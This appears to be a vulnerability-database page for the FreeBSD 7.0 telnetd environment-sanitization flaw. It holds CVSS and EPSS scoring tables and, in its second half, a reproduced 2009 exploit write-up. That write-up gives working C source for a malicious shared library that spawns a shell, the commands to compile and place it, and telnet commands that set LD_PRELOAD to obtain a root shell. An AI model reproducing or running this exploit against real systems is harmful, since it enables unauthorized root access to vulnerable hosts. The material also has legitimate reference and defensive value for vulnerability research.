CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
sys_term.c in telnetd in FreeBSD 7.0-RELEASE and other 7.x versions deletes dangerous environment variables with a method that was valid only in older FreeBSD distributions, which might allow remote attackers to execute arbitrary code by passing a crafted environment variable from a telnet client, as demonstrated by an LD_PRELOAD value that references a malicious library.
Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
7.44%
–
–
2022-04-03
–
–
7.44%
–
–
2023-02-26
–
–
7.44%
–
–
2023-03-12
–
–
–
7.09%
–
2023-05-28
–
–
–
6.46%
–
2024-03-03
–
–
–
8.86%
–
2024-06-02
–
–
–
8.86%
–
2024-09-01
–
–
–
8.34%
–
2024-09-08
–
–
–
8.34%
–
2024-12-22
–
–
–
9.03%
–
2025-01-19
–
–
–
9.03%
–
2025-03-18
–
–
–
–
5.39%
2025-04-15
–
–
–
–
5.39%
2025-04-15
–
–
–
–
5.39,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.
There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.
The telnet protocol allows to pass environment variables inside the
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be a ftp server running beside
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.
Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-----
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-----
Then we compile this stuff.
---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-----
Then we copy the file to a known location (local root exploit)
---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----
...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.
---snip-----
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-----
ALEX-ALEX
#ROOTSHELL
This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.
Signed,
Kingcope[nikolaos rangos]/2009
# milw0rm.com [2009-02-16]